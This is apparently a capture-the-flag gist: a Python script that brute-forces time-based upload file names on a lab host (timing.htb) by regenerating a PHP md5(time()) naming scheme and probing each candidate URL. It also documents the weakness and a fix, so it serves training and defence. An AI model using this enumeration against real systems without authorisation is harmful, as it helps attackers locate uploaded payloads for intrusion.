
@0xj0y
Created January 9, 2022 05:11
#!/usr/bin/python3
import subprocess
import requests
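def fuzz(file_name):
    """Report whether ``file_name`` appears to exist in the uploads directory.

    Sends one GET request for ``file_name`` under
    ``http://timing.htb/images/uploads/`` and treats every status other
    than 404 as a hit.

    Args:
        file_name: Candidate file name, appended to the base URL as-is.

    Returns:
        True when the response status is not 404, otherwise False.

    Raises:
        requests.exceptions.RequestException: on connection errors or when
            the server does not answer within the timeout.
    """
    url = 'http://timing.htb/images/uploads/' + file_name
    # Bounded wait: without a timeout a single stalled connection would
    # block the caller's loop indefinitely.
    res = requests.get(url, timeout=10)
    if res.status_code != 404:
        # NOTE: any non-404 answer (403, 500, ...) is reported as found, so
        # the message is a lead to verify rather than proof the file exists.
        print(f'[+] Found the file at {url}')
        return True
    # Explicit negative result instead of the implicit None.
    return False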
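def main():
    """Generate candidate upload names with PHP until ``fuzz`` reports a hit.

    Each round runs a PHP one-liner that builds
    ``md5('$file_hash' . time()) . '_' . basename('test.jpg')`` and passes the
    result to ``fuzz``. Because ``'$file_hash'`` is single-quoted, PHP does
    not interpolate it, so the ``uniqid()`` value never enters the hash and
    the name depends only on the current second. Presumably this mirrors the
    naming code of the application under test, which is not shown here.

    Defensive takeaway: a name built this way is predictable to anyone who
    knows the upload time; upload names should come from a CSPRNG (for
    example PHP's ``random_bytes``) and the upload directory should not
    serve files back directly.

    Raises:
        subprocess.CalledProcessError: if the PHP interpreter exits non-zero.
        RuntimeError: if PHP produced no output.
    """
    # Passed as an argument vector, so no shell is involved and the PHP
    # source needs no backslash escaping (the old "\$" sequences were
    # invalid Python escapes that trigger a SyntaxWarning on recent versions).
    php_code = (
        "$file_hash=uniqid(); "
        "$file_name=md5('$file_hash' . time()) . '_' . basename('test.jpg'); "
        "echo $file_name;"
    )
    while True:
        # run() waits for the child and closes its pipe; the previous bare
        # Popen left an unreaped process behind on every iteration.
        completed = subprocess.run(
            ['/usr/bin/php', '-r', php_code],
            stdout=subprocess.PIPE,
            check=True,
        )
        file_name = completed.stdout.decode('utf-8')
        if not file_name:
            # An empty name would make fuzz() request the directory itself
            # and report a false hit on any non-404 answer.
            raise RuntimeError('PHP produced no file name')
        if fuzz(file_name):
            break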
if __name__ == '__main__':
    # main() loops until a hit is reported; Ctrl-C is the normal way to stop
    # it early, so the interrupt is swallowed to exit without a traceback.
    try:
        main()
    except KeyboardInterrupt:
        pass